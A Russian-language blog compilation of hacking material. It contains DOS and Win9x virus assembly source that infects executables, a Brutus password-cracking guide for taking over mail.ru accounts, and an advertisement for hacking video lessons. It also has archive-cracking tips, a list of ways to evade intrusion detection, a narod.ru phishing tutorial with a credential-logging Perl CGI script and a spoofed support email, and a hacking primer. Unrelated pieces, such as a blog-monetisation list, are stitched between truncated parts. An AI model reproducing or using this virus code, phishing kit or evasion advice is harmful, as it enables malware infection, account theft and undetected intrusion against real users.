mov si,offset buffer.where_from_flag
sub si,adjust
add si,bx
cmp word ptr [si],0000h
jnz infected_run
int 020H

infected_run:
mov si,offset buffer.pointer1
sub si,adjust
add si,bx
mov dx,[si]
push ds
mov ax,[si+2]
mov ds,ax
push bx
mov ax,1a00h
int 21h
pop bx
pop ds
mov si,offset buffer.ES_save
sub si,adjust
add si,bx
mov ax,[si]
mov es,ax
push bx
call mary_proc
pop bx
mov si,offset buffer.IP_save
sub si,adjust
add si,bx
mov ax,[si]
mov dx,[si+2]
mov si,offset buffer.far_push
sub si,adjust
add si,bx
mov cx,[si]
push ax
mov ax,cs
sub ax,cx
mov di,ax
add dx,ax
pop ax

mov si,offset buffer.SS_save
sub si,adjust
add si,bx
mov cx,word ptr [si]
add cx,di

push es
pop ds

cli
mov ss,cx
sti
push dx
push ax
retf

search_exe PROC
push si
push dx
call transfer_filespec

call find_first
jc not_here
call try_to_infect

mov si,offset buffer.infected
sub si,adjust
add si,bx
test word ptr [si],0ffffh
jz try_next
jmp quiet_exit

try_next:
call find_next

jc not_here
call try_to_infect
mov si,offset buffer.infected
sub si,adjust
add si,bx
test word ptr [si],0ffffh
jz try_next
jmp quiet_exit

not_here:
pop dx
push dx
call search_all
call find_first
jnc attribute_test

quiet_exit:
pop dx
pop si
ret

attribute_test:
mov si,dx
test byte ptr [si+015h],010h


jne dir_found
more_tries:
call find_next


jc quiet_exit
test byte ptr [si+015h],010h
jz more_tries
dir_found:
cmp byte ptr [si+01Eh],02Eh

jz more_tries

call dta_compute

push ax
mov ah,01Ah
int 021h
pop ax
push si
mov si,offset buffer.infected
sub si,adjust
add si,bx
test word ptr [si],0ffffh
pop si
jnz quiet_exit
jmp more_tries
search_exe ENDP

dta_compute PROC
push di
push si
push ax
push bx
cld
mov si,dx
add si,01EH

store_loop:
lodsb
stosb
or al,al
jne store_loop
std
stosb
mov al,05Ch
stosb
add di,2
call search_exe
pop bx
pop ax
pop si
pop di
ret
dta_compute ENDP

try_to_infect PROC
push ax
push bx
push cx
push dx
push si
push di

push es
push bx
mov ax,2f00h
int 21h
mov ax,bx
pop bx
mov si,offset buffer.pointer3
sub si,adjust
add si,bx
mov [si],ax
add si,2
mov ax,es
mov [si],ax
pop es

mov dx,offset buffer.new_data
sub dx,adjust
add dx,bx
push bx
mov ax,1a00h
int 21h
pop bx
mov di,offset buffer.new_area
mov si,offset buffer.buffer1
sub di,adjust
sub si,adjust
add di,bx
add si,bx
cld

move_path:
lodsb
stosb
or al,al
jnz move_path
std
mov al,''
mov cx,0040h
std
repne scasb

mov si,offset buffer.pointer3
sub si,adjust
add si,bx
mov ax,[si]
mov si,ax
add di,2
o_kay:
add si,001eh
cld
move_fnm:
lodsb
stosb
or al,al
jnz move_fnm

push dx
push bx
mov dx,offset buffer.new_area
sub dx,adjust
add dx,bx
mov ax,3d02h
int 21h
pop bx
pop dx
jnc go_ahead
jmp error_exit
go_ahead:
mov si,offset buffer.handle
sub si,adjust
add si,bx
mov [si],ax

push bx
mov bx,ax
push dx
mov cx,0000h
mov dx,0000h
mov ax,4202h
int 21h
mov cx,dx
pop dx
pop bx
jnc compute_length
jmp close_error

compute_length:
sub ax,000ch
sbb cx,0000h
save_offset:
mov si,offset buffer.pointer5
sub si,adjust
add si,bx
mov [si],ax
add si,2
mov [si],cx

push bx
push dx
mov si,offset buffer.handle
sub si,adjust
add si,bx
mov bx,[si]
mov dx,ax
mov ax,4200h
int 21h
pop dx
pop bx
jnc set_buffer
jmp close_error

set_buffer:
push bx
push dx
mov dx,offset buffer.new_data
sub dx,adjust
add dx,bx
mov si,offset buffer.handle
sub si,adjust
add si,bx
mov bx,[si]
mov cx,000ch
mov ax,3f00h
int 21h Читать далее...

Вот сразу вам исходник переводите сами
------------------------------------------------------------------------------


;DEBUG equ YEZ ; infect only .z0m files&dont kill av

vir_size_infile equ (((vir_size)*5/2+4095) and (not 4095))

IFSMGR_Ring0_FileIO equ 000400032h

R0_OPENCREATFILE equ 0D500h ; Open/Create a file
R0_OPENCREAT_IN_CONTEXT equ 0D501h ; Open/Create file in current context
R0_READFILE equ 0D600h ; Read a file, no context
R0_WRITEFILE equ 0D601h ; Write to a file, no context
R0_READFILE_IN_CONTEXT equ 0D602h ; Read a file, in thread context
R0_WRITEFILE_IN_CONTEXT equ 0D603h ; Write to a file, in thread context
R0_CLOSEFILE equ 0D700h ; Close a file
R0_GETFILESIZE equ 0D800h ; Get size of a file
R0_FINDFIRSTFILE equ 04E00h ; Do a LFN FindFirst operation
R0_FINDNEXTFILE equ 04F00h ; Do a LFN FindNext operation
R0_FINDCLOSEFILE equ 0DC00h ; Do a LFN FindClose operation
R0_FILEATTRIBUTES equ 04300h ; Get/Set Attributes of a file
GET_ATTRIBUTES equ 00h
SET_ATTRIBUTES equ 01h
R0_RENAMEFILE equ 05600h ; Rename a file
R0_DELETEFILE equ 04100h ; Delete a file
R0_LOCKFILE equ 05C00h ; Lock/Unlock a region in a file
R0_GETDISKFREESPACE equ 03600h ; Get disk free space
R0_READABSOLUTEDISK equ 0DD00h ; Absolute disk read
R0_WRITEABSOLUTEDISK equ 0DE00h ; Absolute disk write


dta_struc struc
dta_fileattr dd ?
dta_time_creation dq ?
dta_time_lastaccess dq ?
dta_time_lastwrite dq ?
dta_filesize_hi dd ?
dta_filesize dd ?
dta_reserved_0 dd ?
dta_reserved_1 dd ?
dta_filename db 260 dup (?)
dta_filename_short db 14 dup (?)
ends

mz_struc struc
mz_id dw ? ; MZ/ZM
mz_last512 dw ?
mz_num512 dw ?
mz_relnum dw ?
mz_hdrsize dw ? ; in PAR
mz_minmem dw ?
mz_maxmem dw ?
mz_ss dw ?
mz_sp dw ?
mz_csum dw ? ; 0
mz_ip dw ?
mz_cs dw ?
mz_relofs dw ?
mz_ovrnum dw ? ; 0
db 32 dup (?)
mz_neptr dd ?
ends

pe_struc struc
pe_id dd ? ; 00 01 02 03 pe00
pe_cputype dw ? ; 04 05 14c..14e: i386..i586
pe_numofobjects dw ? ; 06 07
pe_datetime dd ? ; 08 09 0a 0b date/time
pe_cofftableptr dd ? ; 0c 0d 0e 0f
pe_cofftablesize dd ? ; 10 11 12 13
pe_ntheadersize dw ? ; 14 15
pe_exe_flags dw ? ; 16 17
; ntheader
pe_ntheader_id dw ? ; 18 19
pe_linkmajor db ? ; 19
pe_linkminor db ? ; 1a
pe_sizeofcode dd ? ; 1c 1d 1e 1f
pe_sizeofinitdata dd ? ; 20 21 22 23
pe_sizeofuninitdata dd ? ; 24 25 26 27
pe_entrypointrva dd ? ; 28 29 2a 2b
pe_baseofcoderva dd ? ; 2c 2d 2e 2f
pe_baseofdatarva dd ? ; 30 31 32 33
pe_imagebase dd ? ; 34 35 36 37 align: 64k
pe_objectalign dd ? ; 39 30 3a 3b 256n > power2 > 512
pe_filealign dd ? ; 3c 3d 3e 3f 64k > power2 > 512
pe_osmajor dw ? ; 40 41
pe_osminor dw ? ; 42 43
pe_usermajor dw ? ; 44 45
pe_userminor dw ? ; 46 47
pe_subsysmajor dw ? ; 48 49
pe_subsysminor dw ? ; 4a 4b
dd ? ; 4c 4d 4e 4f
pe_imagesize dd ? ; 50 51 52 53 align: objectalign
pe_headersize dd ? ; 54 55 56 57 dosh+peh+objecttable
pe_checksum dd ? ; 58 59 5a 5b 0
pe_subsystem dw ? ; 5c 5d
pe_dllflags dw ? ; 5e 5f
pe_stackreservesize dd ? ; 60 61 62 63
pe_stackcommitsize dd ? ; 64 65 66 67
pe_heapreservesize dd ? ; 68 69 6a 6b
pe_heapcommitsize dd ? ; 6c 6d 6e 6f
pe_loaderflags dd ? ; 70 71 72 73
pe_numofrvaandsizes dd ? ; 74 75 76 77 =10h
; rva/sizes
pe_rvasizes label dword
pe_exporttablerva dd ? ; 78 79 7a 7b
pe_exporttablesize dd ? ; 7c 7d 7e 7f
pe_importtablerva dd ? ; 80 81 82 83
pe_importtablesize dd ? ; 84 85 86 87
pe_resourcetablerva dd ? ; 88 89 8a 8b
pe_resourcetablesize dd ? ; 8c 8d 8e 8f
pe_exceptiontablerva dd ? ; 90 91 92 93
pe_exceptiontablesize dd ? ; 94 95 96 97
pe_securitytablerva dd ? ; 98 99 9a 9b
pe_securitytablesize dd ? ; 9c 9d 9e 9f
pe_fixuptablerva dd ? ; a0 a1 a2 a3
pe_fixuptablesize dd ? ; a4 a5 a6 a7
pe_debugtablerva dd ? ; a8 a9 aa ab
pe_debugtablesize dd ? ; ac ad ae af
pe_imgdescrrva dd ? ; b0 b1 b2 b3
pe_imgdescrsize dd ? ; b4 b5 b6 b7
pe_machinerva dd ? ; b8 b9 ba bb
pe_machinesize dd ? ; bc bd be bf
pe_tlsrva dd ? ; c0 c1 c2 c3
pe_tlssize dd ? ; c4 c5 c6 c7
pe_loadcfgrva dd ? ; c8 c9 ca cb
pe_loadcfgsize dd ? ; cc cd ce cf
dq ? ; d0 d1 d2 d3 d4 d5 d6 d7
pe_iattablerva dd ? ; d8 d9 da db
pe_iattablesize dd ? ; dc dd de df
dq ? ; e0 e1 e2 e3 d4 e5 e6 e7
dq ? ; e8 e9 ea eb ec ed ee ef
dq ? ; f0 f1 f2 f3 f4 f5 f6 f7
ends

oe_struc struc
oe_section_name db 8 dup (?);00 01 02 03 04 05 06 07
oe_virt_size dd ? ; 08 09 0a 0b
oe_virt_rva dd ? ; 0c 0d 0e 0f align: objectalign
oe_phys_size dd ? ; 10 11 12 13
oe_phys_offs dd ? ; 14 15 16 17 align: filealign
db 12 dup (?);for obj file
oe_section_flags dd ? ; 24 25 26 27
ends

VxDcall macro Service
db 0CDh
db 020h
dd Service
endm

VMMcall macro Service
VxDcall VMM&Service&
endm

p386
model flat

locals __
jumps

.code

start:
db 0b8h
@@kbase dd 0

replace_start:
mov ecx, [esp+eax]
mov eax, [esp+eax+4]

push ebp

sub esp, size sdata / 2 - 4
push eax
sub esp, size sdata / 2

mov ebp, esp
cld

sdata Читать далее...

[показать]
[Этот ролик находится на заблокированном домене]

11 способов заработать на блоге

1. Можно продавать “спонсорские ссылки” в каждом посте. (См., например, у Давыдова) Спонсоры получают какой-то трафик и обратную ссылку, иногда с нужным им анкором.

2. Можно продавать места под баннеры. Трафик + имидж. (См. у Уникального)

3. Можно продавать “навечно” ссылки в постах блоге. Желательно оптом. Можно в старых постах. Для роботов поисковиков. Этот вид продаж в ру-блогосфере пока не развит. (Update - появился отличный сервис для продажи ссылок прямо в существующем тексте http://promotext.ru)

4. Можно продавать ссылки через универсальные системы, типа Sape (здесь стоит моя реферальная ссылка, зарегистрировавшимся через нее людям с реальными сайтами - помогу.). Нужен пиар 2-3 и тИЦот 30-40, чтобы какие-то ощутимые деньги были.

5. Можно продавать свои услуги, как Сергей Жуковский (говорит с блога на 60% продаж больше, чем с сайта). Талатливые люди там много могут заработать.

6. Можно ставить системы контекстной рекламы (Google Adsense, Я.Директ, Бегун, …). На русскоязычных блогах, правда, это слабо работает.

7. Можно ставить партнерские программы (продажа книг, дисков, …). Кто-то делает хорошие деньги на этом, но надо научиться. И желательно, чтобы блог был по теме - скажем, обзор книг делать постоянно.

8. Находить себе рефералов - людей, которые по вашей ссылке становятся участниками какой-либо программы. Идут проценты с заработка системы, с рефералов ничего дополнительно не берется.

9. Рекламируя свои проекты, которые приносят вам деньги. Надо иметь таковые))

10. Писать рекламные посты (блогун, noretype, …). Принимают не всех, говорят.

11. Найти работу через блог (как Сергей Коркин) или прославиться и стать журналистом, как Гоблин Гага)) И зарплата, и self-брендинг.

(что-то наверное упустил, буду делать апдейты)

Update

12. Автоматическое размещение статей на блоге (liex, seozavr, …).

13. Джинса - скрытая реклама на блоге, в отличие от п. 10 без указания, что за это заплачено.

14. Рекламировать и получать процент с продаж каких-то оффлайновых проектов (знакомых, друзей).


[показать]

Brutus AET2, написанная в январе 2000 года, является мощным средством для перебора паролей на WWW ресурсы, почту и с использованием многих других протоколов. С помощью этой программы также можно подбирать пароли на шары, можно поиздеваться над соседом, который по ошибке поставил себе NetBus server и забыл на него пароль:-)

Для тех, у кого на винте нет ни одного словаря, в чем я сильно сомневаюсь, программа поможет сгенерировать свой. Причем эту возможность мы бы посоветовали всем, даже тем, кто собирается ломать пароли какой-либо другой программой. "Зачем?", спросите Вы. А затем, что Вы вряд ли найдете где-нибудь еще возможность создать "мутирующий" словарь мегабайт на 30.

А если у Вас уже есть готовые словари, то с помощью этой программы Вы сможете поудалять из них дубликаты или преобразовать словарь для Unix в словарь для Windows. Заманчиво, не правда ли?! Тогда слушайте дальше. Программа позволит Вам применять Брутфорс (для любителей грубой физической силы), что у нее получается довольно неплохо.

Итак, обсудив некоторые общие вопросы, переходим к частному, а именно к описанию функций Brutus AET2.

...к частному.

Функции программы в детальном описании:

- Menu Bar
Отсюда Вы будите сохранять и загружать результаты уже проделаннй работы.
Tools >> Wordlist Generation - обращение к Wordlist Tools. С него-то и начнем.
Input list - имя используемого словаря.
Output list - куда сохранить результаты.
Функции меню:
~ Convert List (LF>CRLF) - конвертирует текстовые файлы формата Unix в текстовые файлы Dos формата.
~ Only Word Length - удаляет из обозначенного Вами словаря в Input list все слова, не соответствующие параметрам заданной длины.
~ Remove Duplicates - удаляет дупликаты слов.
~ Permutations - удаляет слова, которые можно получить путем перестановки, к примеру: если в словаре имеется слово Pas, то Брутус удалит из него слово sap и т.д.
~ Create New List - создание списка Users/Passwords "из ничего". Как уже было отмечено выше, это очень полезная вещь.
Определяем символы, которые могут быть использованы в подбираемом пароле или имени, минимальную и максимальную длину и просим Брутус создать словарь нажатием кнопки Action. Если что-то не получилось, и словарь не создан, значит плохо просили :-)))
Дальше больше...

- Target
Сюда необходимо ввести адрес цели. xxx.xxx.xxx.xxx или буквами (в зависимости от того, что Вы знаете о жертве, и то и дугое узнать не трудно), например pop.mail.ru.

- Type
Выбираем, каким способом будет происходить перебор паролей. Кроме стандартных http (basic auth), ftp, pop3, telnet, smb и NetBus имеется Custom - пожалуй наиболее сложная часть Брутуса, представляющая собой функцию "конфигурирования под себя". Здесь можно самостоятельно установить время задержки, после какого слова вводить user name, после какого password etc.

Здесь хотелось бы отметить, что Brutus AET2 не является программой "для чайников" и ничего за Вас не сделает, если Вы не приложите к этому руку. Использование этой программы подразумевает наличия у человека минимальных знаний и выше. Поэтому, если это первая программа, которую вы собираетесь использовать в своей ][-жизни, отложите ее на время и почитайте немного ][-Доков, никто Вас за это не осудит.

- Connection Options
~ Port: ставится автоматически при использовании стандартных средств подборки паролей.
~ Connections - максимальное число одновременных соединений с сервером.
~ Timeout - время ожидания ответа сервера на посланный запрос.
Чем больше Connections и Timeout, тем медленнее идет процесс перебора.
~ Proxy - используется для перебора паролей к серверу через прокси.

- Authentification Options
Здесь устанавливаем, что именно необходимо подобрать. Это может быть либо пароль из словаря с уже известным user-name, либо одновременный перебор User-name и Passwords по словарю. Up to You, как говорится. Здесь же прописывается путь к словарь, по которому будет происходить перебор. Для применения bruteforce атаки ставим PassMode >> Bruteforce, что позволяет определить минимальную и максимальную длину пароля, а также, из каких символов он должен состоять. В этом случае программа будет сама генерировать пароли - без какого-либо словаря.

- Positive Authentification Results
Не трудно догадаться, что именно здесь должны появляться подобранные пароли и логины.

- Status Indication
Будет оповещать Вас о ходе процесса перебора, постоянно помигивая одним из своих индикаторов. К примеру, мигающий Timeout означает, что данной функции было поставлено слишком маленькое значение и программа разорвала соединение с сервером, так и не получив ответа.

Небольшой пример

Для взлома аккаунта на mail.ru необходимо использовать следующий алгаритм:

Сначала нам понадобится вордлист (это файлик, где лежат часто используемые пароли).

Теперь нам надо узнать pop3 сервер ломаемого мыла. Для этого идём туда, где это мыло зарегано, например, для мыла vasja@mail.ru мы пойдём на www.mail.ru, а для мыла Читать далее...

Видео-уроки по Хакерству (47 штук)
Год выпуска: 2008
Размер файла: 48.1 Мб
Кол-во партов: 1
О программе: Наверное, у каждого из нас было (ну или есть) желание "напакостить" в сети, т.е. заняться хакерством. Но не каждому это было под силу!!! Но теперь, с помощью этих видео уроков, Вы научитесь не только красть чужие ICQ номерки и читать чужую почту, но и также узнаете как можно себя обезопасить от взлома.
Продолжительность: 04:09:00
Системные требования: любой проигрыватель
Общий размер архива: 48.1 Мб (сжато с 3.6 Гб !!!)

В архив входят следующие ролики:
01. Как стать админом форума ITA v1.49
02. Подбор пароля к мылу
03. Переполнение буфера на практике
04. cgi баг
05. К чему приводит самая распостраненая ошибка в cgi
06. cosmo-chat bug 3 (захват сайта)
07. Взлом сервера
08. Самый легкий способ дефейса
09. Воруем мыло
10. Как можно стать админом на сайте сделаным на Flat-nuke
11. Баг в настройке серваков поставленных на фряхе (FreBSD)
12. Как можно украсть красивый номер icq
13. Просмотр чужих писем на mail.ru
14. Удаленное выполнение php кода
15. Пару баг xss в форуме MercuryBoard
16. Как качать mp3 на халяву с сайта mp3search.ru
17. Как качать mp3 на халяву с сайта mp3search.ru (способ 2)
18. Серийник к проге mphone
19. Ломка хорума punBB до версии 1.1.5
20. Как зайти на чужой комп с помощью радмин
21. Как незаметно можно читать почту на рамблере
22. Тырим ник в чате
23. Как реально можно получить рута на удаленном серве
24. Еще один способ по угону ников в чатах на подобии www.neuch.ru/chat/
25. Как использовать XSS в vBulletin 3x
26. Как читать чужие письма на e-mail.ru и т.д.
27. Как ломать сайт или почту на org.ru или nm.ru
и т.д.

Пароль на все архивы - hacker-pro.net


Размер: 25.7 Mbhttp://fileshare167.depositfiles.com/auth-1247345174f9b439116ffcb432d42b9c-84.18.102.14-429014169-13744694-guest/FS167-5/xak.part1.rar?
Размер: 22.38 Mb

Как взломать пароль к архиву
Возможно ли мгновенно взломать пароль ARJ, ZIP, RAR и других архивов?
Нет, пароль архива не хранится в самом архиве, поэтому вы не можете его вытащить или изменить программу таким образом, чтобы пароль не запрашивался. Обычно архиваторы зашифровывают уже сжатый файл (а не сжимают зашифрованный) и сохраняют его контрольную сумму. Затем, при разархивации этот файл расшифровывается и контрольная сумма сверяется.

Как взломать пароль ZIP-архива?
Zip-архивы (pkzip, WinZip версии до 8.0) используют собственный алгоритм шифрования, который является очень нестойким. Это приводит к двум практическим уязвимостям. Во-первых, всегда можно осуществить атаку по открытому тексту (для этого нужен один незашифрованный файл из архива). Во-вторых, если архив создан WinZip или Infozip и содержит 5 или более файлов, то возможно произвести гарантированную расшифровку архива, независимо от длины и сложности пароля. Обе эти атаки занимают всего пару часов на современном компьютере. В последних версиях WinZip есть опция, позволяющая использовать стойкий алгоритм AES. В этом случае вышеописанные атаки неприменимы и остается перебор паролей. Современные взломщики паролей ZIP должны поддерживать обе атаки.

Как взломать пароль RAR-архива?
Архиватор RAR/WinRAR версии 2.х использовал собственный, но достаточно стойкий алгоритм шифрования. По крайней мере, не были известны атаки на RAR 2.0, кроме перебора. Начиная с версии 3.0, RAR использует стойкий алгоритм AES, который не допускает никаких атак эффективнее перебора паролей. Более того, реализация системы шифрования такова, что скорость перебора составляет всего около 100 паролей в секунду. Это позволяет считать RAR 3.x самым стойким с точки зрения перебора паролей из распространенных систем шифрования. Это означает, что нельзя взломать пароль RAR длиннее 6-7 символов, если нет никакой информации об этом пароле.

Как взломать пароль ARJ-архива?
Архиватор ARJ использует очень слабый алгоритм шифрования - он просто выполняет операцию XOR со паролем. Это приводит к тому, что если у Вас есть один незашифрованный файл из архива, то пароль на этот архив можно узнать мгновенно. У системы шифрования ARJ существуют и другие уязвимости. Например, первые три символа пароля можно узнать без полного перебора и сам перебор очень быстрый, поэтому могут быть взломаны пароли длиной до 12-14 символов.

Можно ли взломать архив, если имеются незашифрованные (или не сжатые) файлы?
Это называется "атака по открытому тексту". Результат зависит от используемого архива. Посмотрите на описание:

- ARJ Да можно, пароли любой длины, мгновенно. Вам надо знать такое количество байтов сжатого файла, из скольких символов состоит пароль.
- ZIP Да можно, (если не использовалось шифрование AES), пароли любой длины, вам надо знать по крайней мере 13 байтов сжатого файла. Может занять несколько часов на современном компьютере.
- RAR 1.5 Да можно, пароли любой длины, вам надо знать 3-4 байта сжатого файла. Потом вам нужно произвести операций 232-240, которые могут занять несколько часов или дней.
- RAR 2.x-3.x Нет нельзя.

Как я могу взломать пароль самораспаковывающегося архива?
Некоторые программы понимают самораспаковывающиеся архивы. Если ваша программа к ним не относится, просто удалить самораспаковывающийся заголовок, и тогда вы получите обычный архив. Для этого вам нужно прочитать техническое описание формата архива, найти сигнатуру, с которой начинается архив, и удалить все байты между началом файла и этой сигнатурой. Также вы можете найти эту сигнатуру, посмотрев на первые байты обычного архива.

50 способов обойти систему обнаружения атак
Предисловие переводчика: небольшое введение к оригинальной статье было удалено, т.к. оно не относилось к делу. В нем описывалось как к Фреду пришла идея написать этот материал. Я его пропустил. Единственное, что надо добавить, - автор предупреждает, что к этому материалу надо относиться одновременно и серьезно и с определенной долей иронии. Многие пути применимы только для ОС Unix.

Вставка посторонних символов в атаку, что обычно приводит к невозможности ее обнаружения. (Примечание переводчика - это касается систем обнаружения злоупотреблений, которые используют сигнатуры атак).
Использование табуляций вместо пробелов в командах. Такое изменение разделителя может также привести к невозможности обнаружения атаки.
Очень близкий путь к п.2. Вы могли бы изменить символ разделителя в системе (например, на %), что приведет к определенным проблемам с системами обнаружения атак.
Измените стандартную последовательность действий при атаке. Например, если атака одинаково осуществляется и при 'a;b;c' и при 'b;a;c', то большинство систем обнаружения атак обнаружит первый вариант реализации атаки, но "заглохнет" на ее вариации.
Разделите атаку между несколькими пользователями. Если взять пример выше, то 'a;b' осуществляет первый пользователь, а 'c' - второй. Такое разделение не обнаруживается многими системами обнаружения атак.
Разделите атаку между несколькими сессиями (сеансами). Например, в такой последовательности: Login -> 'a;b' -> Logout -> Login -> 'c'.
Разделите атаку между несколькими удаленными IP-адресами/системами. Например, с узлов X и Y запустите 'a' с X, 'b' с Y, а затем 'c' опять с X.
Определите макрос для команды, используемой в атаке. Например, для команды 'cp' определите макрос '$ZZ' и в дальнейшем используйте его вместо 'cp'.
Определите макрос как параметр, используемый в атаке. Например, используйте '$P' вместо строки '/etc/passwd'.
Создайте скрипт, который заменит команды, используемые при атаке. Если тщательно реализовать эту операцию, то система обнаружения атак не сможет связать вместе название скрипта и команд для атаки, что приведет к ее пропуску.

Дополнительная атака - добавьте комментарий к строке атаки.

Используйте различные команды для выполнения одинаковых функций. Например, в Unix 'echo *' это почти то же самое, что и 'ls'.
Измените имена в атаках. Например, если атака использует временный файл 'xxx', то измените его на 'yyy'.
Создайте code-book translator для ключевых слов атаки. Это может быть выполнено пересылкой всех команд атаки через фильтр с использованием 'sed' для строковых замен.
Кодируйте атаку в кодировке 'ebcdic' и измените тип терминала на 'ebcdic'. Система обнаружения атак не может определить атаки в различных кодировках.
Реализуйте атаки по зашифрованному каналу.
Используйте постфиксную нотацию для передачи данных или команд атаки, а затем возврат обратно по ее окончании. Система обнаружения атак не сможет распознать команды, посланные в таком виде. (Примечание переводчика - главное, чтобы атакуемая система тоже смогла понять обратный порядок).
Включите полнодуплексный (full duplex) режим соединения с целью атаки. Дополнительные символы, создаваемые в этом режиме, будут путать систему обнаружения атак.
Смешайте несколько атак, чередуя команды из каждой. Система обнаружения атак не должна правдоподобно распознавать ни одну из них.
Кодируйте результаты атак таким образом, чтобы они не совпадали с шаблонами и не могли быть использованы для обнаружения атак. Например, вместо того, чтобы сразу послать себе по почте файл паролей, используя ошибку в sendmail, пропустите этот файл через скрипт 'sed' и замените все символы ':' на '-'. Тем самым, вы несущественно измените файл паролей, который уже не будет соответствовать шаблону.
Атака "пропускается" через скрипт замены символов, написанный на awk. Это вводит в заблуждение систему обнаружения атак.

Дополнительная атака - Выполните команды, выбираемые из таблицы выполненных перед этим команд по номеру строки этой таблицы. Например, для выполнения команды 'dir *.com' вы могли бы дать команду '15 *.com'.

Подавите порт модуля слежения. Например, вы могли бы посылать echo на порт модуля слежения, тем самым делая невозможным прием других данных.
Пошлите системе обнаружения атак пакеты PING большого размера. Многие системы будут выведены из строя.
Уничтожьте систему обнаружения атак нападая на узел, на котором она установлена. Скомпрометировав этот узел, вы сможете вывести из строя и саму систему обнаружения атак.
Создайте ложные записи в журналах регистрации для введения в заблуждение системы обнаружения атак. Например, создайте между событиями, характеризующими атаку, ложное событие, приводящее к обману системы обнаружения атак.
Займите все дисковое пространство, выделенное для системы обнаружения атак. Например, вы можете создать очень много событий, которые переполнят журналы системы обнаружения атак и не позволяет ей Читать далее...

Взлом сайтов на narod.ru

Вот сидел я и решил всё таки написать чё-нить ;) По большому настоянию Eraser. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать ;) Начнём для проведения нижеописанных действий вам понадобятся:
1. Мозги
2. Руки
3. Хостинг с поддержкой CGI
4. Небольшое знание HTML
И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа ;) Подправляем его, как надо, вставляем туда форму:


Ещё надо написать write.cgi:
&GetFormInput;

$name=$field{'name'};
$pass=$field{'pass'};

sub GetFormInput {

(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;

if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE "\n$pass";
print OUTFILE "\n=======END=======\n\n";
close (OUTFILE);
print "Location: http://your_redirect_URL\n" ;

Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. ;)
Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов
надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот. ;) короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать ;).
Дополнение:
В доставание пароля вам поможет ваша фантазия при написание письма лопуху…

Полный мануал по взлому

Я увлекаюсь защитой систем, а самый лучший админ - это хакер. Точно так же можно сказать, что самый лучший хакер - это злой админ :). Я написал эту статью в надежде, что она будет восприниматься как руководство по защите твоей собственности. Я пишу этот текст только в познавательных целях. Помни, что взлом не украшает человека и не ставит тебя автоматически в ряды элиты, хотя и таким образом тоже попадают в наши ряды. Я так же считаю своим долгом напомнить тебе про существование УК, в котором предусмотрены нехилые наказания за информационный вандализм. Рисунок 1. www.securetyfocus.com Приступим: Допустим, что у тебя есть какой-то сервер, который ты хочешь взломать или протестировать на защищенность от взлома. С чего нужно начинать? Что сделать в первую очередь? Сразу очень много вопросов и ни одного ответа. Четкой последовательности действий нет. Взлом - это творческий процесс, а значит, и подходить к нему приходиться творчески. Нет определенных правил и нельзя все подвести под один шаблон. Зато есть несколько рекомендаций, которых желательно придерживаться. Приступим: Самое первое, с чего начинается взлом или тест системы на дырявость - сканирование портов. Для чего? А для того, чтобы узнать, какие сервисы/демоны установлены в системе. Каждый открытый порт - это сервисная программа установленная на сервере, к которой можно подключиться и выполнить определенные действия. Например, на 21-м порту висит FTP сервис. Если ты сможешь к нему подключиться, то тебе станет доступной возможность скачивания и закачивания на сервер файлов. Но это только если ты будешь обладать соответствующими правами. Первое, что нужно просканировать - первые 1024 порта. Среди них очень много стандартных сервисов типа FTP, HTTP, Telnet и т.д. Все открытие порты - это дверь с замочком для входа на сервер. Чем больше таких дверей, тем больше вероятность, что какой-то замок не выдержит натиска и откроется. У хорошего админа открыты только самые необходимые порты. Например, если это WEB-сервер не предоставляющий доступ к почте, то нет смысла держать сервисы почтовых серверов. Рисунок 2. Сканирование портов Хороший сканер портов не только говорит номер открытого порта, но и показывает название установленного на нем сервиса. Желательно, чтобы сканер умел сохранять результат своей работы в каком-нибудь файле. Если этой возможности нет, то придется переписать все вручную и положить на видное место. В дальнейшем тебе пригодиться каждая строчка твоих записей. После этого можешь сканировать порты свыше 1024. Здесь стандартные сервисы встречаются редко. Зачем же тогда сканировать? А вдруг кто-то до тебя уже побывал здесь и оставил открытую дверку или протроянил сервак. Большинство троянов держат открытыми порты свыше 1024, поэтому если ты админ и нашел открытый порт с номером больше 1024, необходимо сразу насторожиться. Ну а если ты взломщик, то необходимо узнать имя трояна и найти для него клиентскую часть. На этом взлом может закончиться, потому что ты уже получил полный доступ к серваку без особых усилий :). Определяем ОС: Теперь мы знаем, какие двери у сервера открыты и чем мы можем воспользоваться. Но этого мало, потому что мы знаем какие есть двери, но не знаем, как их открыть. Сканирование - это всего лишь самый начальный этап, который тебе еще ничего особенного не сказал. Самое главное перед взломом - определить, какая ОС стоит на серваке. Желательно знать и версию, но это удается не всегда, да и на первых парах изучения системы можно обойтись без конкретизации. Для определения версии я могу посоветовать Shadow Scan. Не могу сказать, что она лучшая, но и к разряду худших отнести ее не имею права. Помимо определения ОС, прога умеет определять версии установленных сервисов. Это тебе может очень сильно помочь. Допустим, что ты узнал, что на серваке установлен WEB-сервер. Ты даже узнал, что ОС именует себя как "Окошки". Ты можешь предположить, что 